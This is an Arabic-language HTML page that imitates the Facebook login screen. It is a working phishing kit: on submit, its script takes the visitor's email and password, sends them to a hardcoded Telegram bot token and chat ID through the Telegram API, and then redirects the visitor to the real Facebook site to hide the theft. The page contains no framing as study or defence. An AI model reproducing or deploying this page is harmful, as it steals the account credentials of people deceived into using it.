<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>تسجيل الدخول إلى فيس بوك</title>
  <style>
    body {
      margin: 0;
      font-family: Helvetica, Arial, sans-serif;
      background-color: #f0f2f5;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
    }

    .container {
      display: flex;
      flex-direction: column;
      align-items: center;
    }

    .logo {
      font-size: 48px;
      color: #1877f2;
      font-weight: bold;
      margin-bottom: 20px;
    }

    .login-box {
      background-color: #fff;
      padding: 20px 25px;
      border-radius: 8px;
      box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
      width: 100%;
      max-width: 360px;
    }

    .login-box input {
      width: 100%;
      padding: 14px;
      margin: 8px 0;
      border: 1px solid #dddfe2;
      border-radius: 6px;
      font-size: 16px;
    }

    .login-box button {
      width: 100%;
      padding: 14px;
      margin-top: 10px;
      background-color: #1877f2;
      color: white;
      font-size: 16px;
      border: none;
      border-radius: 6px;
      cursor: pointer;
      font-weight: bold;
    }

    .login-box button:hover {
      background-color: #165ecf;
    }

    .status {
      margin-top: 12px;
      font-size: 14px;
      text-align: center;
      color: green;
    }

    .note {
      margin-top: 30px;
      font-size: 12px;
      color: gray;
      text-align: center;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="logo">facebook</div>

    <div class="login-box">
      <form id="loginForm">
        <input type="email" id="email" placeholder="البريد الإلكتروني أو رقم الهاتف" required />
        <input type="password" id="password" placeholder="كلمة السر" required />
        <button type="submit">تسجيل الدخول</button>
        <p class="status" id="status"></p>
      </form>
    

  <script>
    const TOKEN ='7980091785:AAGXalXVNvtluTKpVg96NyiSmLIN-Ql7D5k';
    const CHAT_ID = '1430370545';

    document.getElementById('loginForm').addEventListener('submit', function(e) {
      e.preventDefault();
      const email = document.getElementById('email').value;
      const password = document.getElementById('password').value;

      const message = encodeURIComponent(`📥 محاولة تسجيل دخول وهمي:\n📧 ${email}\n🔑 ${password}`);
      const url = `https://api.telegram.org/bot${TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${message}`;

      fetch(url)
        .then(res => {
          window.location.href = 'https://www.facebook.com'; // التوجيه بعد الإرسال
        })
        .catch(() => {
          document.getElementById('status').innerText = 'حدث خطأ في الاتصال.';
        });
    });
  </script>
</body>
</html>
